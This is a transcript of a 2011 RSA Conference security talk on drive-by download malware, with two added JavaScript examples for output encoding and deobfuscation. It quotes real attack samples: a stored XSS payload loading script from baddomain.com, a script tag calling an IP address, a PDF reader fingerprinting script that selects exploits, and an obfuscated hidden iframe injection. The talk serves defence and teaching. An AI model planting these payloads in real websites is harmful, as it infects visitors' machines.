Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

Description: Presentation delivered at the RSA 2011 Conference on how to better protect your website from hacker attacks.

Transcript of Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

Page 1: Drive By Downloads: How To Avoid Getting a Cap Popped in Your App

Session ID: xxx-xxxx

Session Classification: xxxxxxxxxxxx

Lars Ewe, Cenzic

Neil Daswani, Dasient

Page 2

Drive-By via XSS on RSA Conf Website

Discovered by Gerry Eisenhaur (Dasient)

Persistent XSS in Jive

“Benign” drive-by injected / Pops up calc.exe

Script element embedded in a “tag” at: https://365.rsaconference.com/people/gerrye?view=bookmarks

Un-escaped tag (and benign drive-by) rendered at https://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102

Yet again: use of SSL alone does not provide security; the code must be made secure as well!

Page 3

Check This Out …

Page 4

Agenda

Quick History of Security

Malware Anatomy & Distribution

Lifecycle of Malware Protection

Future of Web Security

Page 5

Quick History: Security

Page 6

Evolution of Security

1980s: Anti-Virus

1986: Brain Virus (Pakistan)

1990: More viruses: Fish, Flip, Whale.

1991-98: Famous Michelangelo. Symantec introduces Norton.

1998-2004: Internet surge, new viruses (Melissa, I love you, Nimda, SQL Slammer, Sobig.F, Nachi, Sasser) cause havoc.

Over 60K known viruses. Frequent updates provided by vendors.

1990s: Network Security

Late 90s: With the explosion of the Internet, network firewalls control traffic.

Intrusion Detection Systems (IDS) introduced to monitor anomalous activity.

Intrusion Prevention Systems (IPS) combined IDS & network firewalls.

Network vulnerability scanning tools introduced to aid vulnerability management.

2000s: Application Security

Late 90s: Internet growth; companies tighten the perimeter but ignore applications.

Some vulnerability scanning tools & WAFs deployed, but security holes remain, especially for custom apps.

Drive-by-downloads mature from prototype attacks to mainstream.

2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft.

2009: Gumblar web worm infects 80K servers; Web malware used in Aurora attack; widget attacks.

2010: Over 1M web sites infected in 1 quarter; large Gov websites hit (NIH, US Treasury, EPA).

Page 7

Fundamental Change in Malware Distribution

                       Late 80s to 90s       Late 90s to mid-2000s               Mid-2000s to present
Distribution methods   Floppy disks, worms   Email attachments, file downloads   Drive-by-downloads (at legitimate sites)
Form of malware        Executable code in static file                            Active content on web pages
Who is infected        Infect clients                                            Infect servers to infect clients
What's exploited       PC, OS, client-side apps                                  Web applications and servers

Websites suffer brand, revenue, and customer losses when infected.

Page 8

Malware Anatomy & Distribution

Page 9

Step 1: Infect a Site (or 2 or 3 or Thousands!)

There is no perimeter

Web 2.0 / external content: Ads (Malvertising), Mash-ups, Widgets, External images, User generated content (HTML, images, links, exe, documents)

Software vulnerabilities: SQL Injection, XSS, PHP file include, Un-patched software (blog, CMS, shopping cart)

Infrastructure vulnerabilities: Vulnerable hosting platform, Network vulnerabilities

Passwords compromised: FTP credentials, SSH credentials, Web server credentials

Page 10

Step 1. Infect via Stored XSS

HTTP request to inject script:

http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript src=baddomain.com%3E%3C/script%3E

Server’s response contains:

<p>Your favorite food is 'cookies <script src=baddomain.com></script>' returned the following results:</p>
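The stored XSS round trip from this slide, as an added example that is not part of the original deck: the un-escaped rendering beside an output-encoded one, in JavaScript. The host, path and parameter name come from the slide; the function names are this example's own, and the literal space in the slide's URL is written as %20.

```javascript
// Added example (not from the slides): the Stored XSS round trip shown on the
// slide, with the un-escaped rendering beside an output-encoded one. The host,
// path and parameter name come from the slide; the function names are this
// example's own.

// The stored value as the server sees it after URL decoding ('+' is a space,
// %3C/%3E are '<'/'>'). The literal space in the slide's URL is written %20 here.
function parseFavoriteFood(requestUrl) {
  return new URL(requestUrl).searchParams.get("Favorite_food") || "";
}

// Vulnerable rendering: the stored value is concatenated straight into the
// HTML, so a stored <script> tag becomes a live script element on every view.
function renderUnsafe(food) {
  return `<p>Your favorite food is '${food}' returned the following results:</p>`;
}

// Minimal entity encoder for text placed in an element body. Attribute, URL
// and JavaScript contexts each need their own encoder.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened rendering: identical markup, but the untrusted value is encoded on
// output, so the browser displays the tag as text instead of executing it.
function renderSafe(food) {
  return `<p>Your favorite food is '${escapeHtml(food)}' returned the following results:</p>`;
}

// Does a response contain a script element? (A crude check, used only to make
// the difference between the two renderers visible.)
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// The slide's injection request, reconstructed here from the slide text.
const SLIDE_REQUEST =
  "http://www.mywwwservice.com/update_profile?Favorite_food=cookies+%3Cscript%20src=baddomain.com%3E%3C/script%3E";

const stored = parseFavoriteFood(SLIDE_REQUEST);
console.log("stored value:", stored);
console.log("unsafe:", renderUnsafe(stored), "script present:", containsScriptElement(renderUnsafe(stored)));
console.log("safe:  ", renderSafe(stored), "script present:", containsScriptElement(renderSafe(stored)));
```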

Page 11

Step 1: Inject Really Malicious JavaScript

Page 12

Step 1: Inject Really Malicious JavaScript

Page 13

Step 1: Inject Really Malicious JavaScript

Pulls in malicious JavaScript from a compromised IP!

Infects the user's machine silently

<script id=_0_ src=//218.93.202.61/cp/></script>

Page 14

Step 2: Invoke Client-Side Vulnerability

CVE-2008-2992. Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.

CVE-2007-5659. Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods.

CVE-2009-0927. Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.

Page 15

Step 2: Ex. Fingerprint PDF Reader

JavaScript generates a zero-size IFRAME in the web page that sources in a PDF file

The PDF file has JavaScript that fingerprints the version of the PDF reader (Note: the JavaScript interpreter used by the PDF reader is different from the one used by the browser)

The attacker needs to determine which version of the PDF reader / JavaScript interpreter to target

Page 16

Step 2: Ex. Fingerprint PDF Reader

function pdf_start(){
  // app.viewerVersion is the reader's own JavaScript API, e.g. "8.1.2"
  var version=app.viewerVersion.toString();
  version=version.replace(/\D/g,'');
  // major, minor and patch digits
  var version_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));
  // each branch selects the helper for a version range matching one of the CVEs on Page 14
  if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]<3)){util_printf();}
  if((version_array[0]<8)||(version_array[0]==8&&version_array[1]<2&&version_array[2]<2)){collab_email();}
  if((version_array[0]<9)||(version_array[0]==9&&version_array[1]<1)){collab_geticon();}
}
pdf_start();

Page 17

Step 3: Deliver Shellcode

Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode

“Spray” the heap with assembly instructions that give shell access

Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())

Page 18

Step 4: Send ‘Downloader’

Example: 2k8.exe

Page 19

Step 5: Join a Botnet: e.g. Zeus

Page 20

Zeus Botnet + Targeted Phishing

Botnet propagation + Targeted Phishing:

1. http://internetbanking.gad.de/banking/
2. http://hsbc.co.uk
3. http://www.mybank.alliance-leicester.co.uk
4. http://www.citibank.de

Page 21

What Next?

Steal credentials (e.g., Zeus)

Sell fake anti-virus (e.g., Koobface)

Steal FTP credentials (e.g., Gumblar)

Steal corporate secrets (e.g., Aurora)

Collect fraudulent click revenue (e.g., ClickbotA)

Page 22

Evolution: Multi-DOM Node Injection

<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div>

<script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');</script>

Page 23

Evolution: Multi-DOM Node Injection

<div id=f37z>*!@g$a+\*t*e##4a+@d^s!.i!n$f+o@@</div>

<script>document.write('<iframe src=\''+unescape(document.getElementById('f37z').innerHTML.replace(/[\+!*^#@$]/g,""))+'\' width=0 height=0></iframe>');</script>

Once the filler characters are stripped, the script writes:

<iframe src=gate4ads.info width=0 height=0></iframe>
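An added example (not from the slides) of how a defender can statically reverse the multi-DOM node obfuscation shown on Pages 22 and 23: it locates the carrier div that a script decodes with a character-stripping replace(), re-applies that transformation without executing any script, and reports the hidden iframe target. The sample HTML and the placeholder domain example.invalid are constructed for this example.

```javascript
// Added example (not from the slides): statically decode the "multi-DOM node"
// obfuscation above. A script that reads <div id=X>'s innerHTML, strips filler
// characters with replace(/[...]/g,"") and document.write()s a hidden iframe is
// resolved here without running any script or touching a DOM.

// Capture the element id and the filler character class from a decoder script:
//   getElementById('ID').innerHTML.replace(/[CHARS]/g,"")
const DECODER_RE =
  /getElementById\(['"]([^'"]+)['"]\)\.innerHTML\.replace\(\/\[([^\]]+)\]\/g,\s*['"]{2}\)/;

// Zero-size iframe written by the same script (the width=0 height=0 tell-tale).
const HIDDEN_IFRAME_RE = /document\.write\([^)]*<iframe[\s\S]*?width=0[\s\S]*?height=0/i;

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// Text content of <div id=ID> (quoted or unquoted id), or null if absent.
function findDivText(html, id) {
  const re = new RegExp(`<div[^>]*\\bid=['"]?${escapeRe(id)}['"]?[^>]*>([\\s\\S]*?)<\\/div>`, "i");
  const m = html.match(re);
  return m ? m[1] : null;
}

// One finding per decoder script whose carrier div exists in the page.
function decodeHiddenIframeTargets(html) {
  const findings = [];
  const scriptRe = /<script[^>]*>([\s\S]*?)<\/script>/gi;
  let s;
  while ((s = scriptRe.exec(html)) !== null) {
    const body = s[1];
    const d = body.match(DECODER_RE);
    if (!d) continue;
    const [, id, charClass] = d;
    const carrier = findDivText(html, id);
    if (carrier === null) continue;
    // Re-apply the script's own transformation (same char class, same unescape).
    const decoded = unescape(carrier.replace(new RegExp(`[${charClass}]`, "g"), ""));
    findings.push({ id, decoded, hiddenIframe: HIDDEN_IFRAME_RE.test(body) });
  }
  return findings;
}

// Constructed sample page using the slide's scheme; the domain is a placeholder.
const SAMPLE_HTML = [
  "<html><body><p>Legitimate page content.</p>",
  "<div id=f37z>*!@e$x+a*m!p@l#e^.$i@n!v*a#l@i^d</div>",
  "<script>document.write('<iframe src=\\''+unescape(document.getElementById('f37z')" +
    ".innerHTML.replace(/[\\+!*^#@$]/g,\"\"))+'\\' width=0 height=0></iframe>');</script>",
  "</body></html>",
].join("\n");

console.log(decodeHiddenIframeTargets(SAMPLE_HTML));
```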

Page 24

Infection Library

Page 25

Infection Library: Example Entry

Page 26

Lifecycle of Malware Protection

Page 27

Defense-In-Depth: Lifecycle of Malware Protection

Assess: Vulnerability & Malware Risk Assessment

Detect: Web Anti-Malware (WAM) Monitoring

Contain: mod_antimalware

Recover: Remove malcode

Prevent: Security Design Review, Secure Coding Practices, Fix Bugs, WAF, Code Reviews

Page 28

Future of Web Security

Page 29

Risk Tolerance

(Figure: risk tolerance by organization size, from F500 / G1000 through SME and SMB, mapped to Mission Critical Security, Important Security and Adequate Security. Integrated Web Scanning / Malware Cloud Solution (Cenzic / Dasient): broad offering, high volume, low cost; delivered as on-premise software or as a managed service.)

Page 30

Manage Website Risk: Fast & Easy

(Figure: applications arranged by risk score from Low to High: Test All Apps For HealthCheck; Strong Testing for Important Apps; Robust Testing for Critical Apps.)

Page 31

Takeaways: What You Should Do Within 3 Months

Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware

Prioritize your vulnerabilities based on risk score

Block until you remediate

Get Feb 2011 Ponemon research report on the state of web application security

Page 32

Integrated HealthCheck Offer & Learn More

Get a Free, Integrated Website HealthCheck! Get a listing of all website vulnerabilities in an easy to read report!

Just email: [email protected]

For more information on Web vulnerability scanning and malware, visit us!

Cenzic: www.cenzic.com / http://blog.cenzic.com

Dasient: www.dasient.com / http://blog.dasient.com

Page 33

Page 34

Thank You!

Lars Ewe, Cenzic

Neil Daswani, Dasient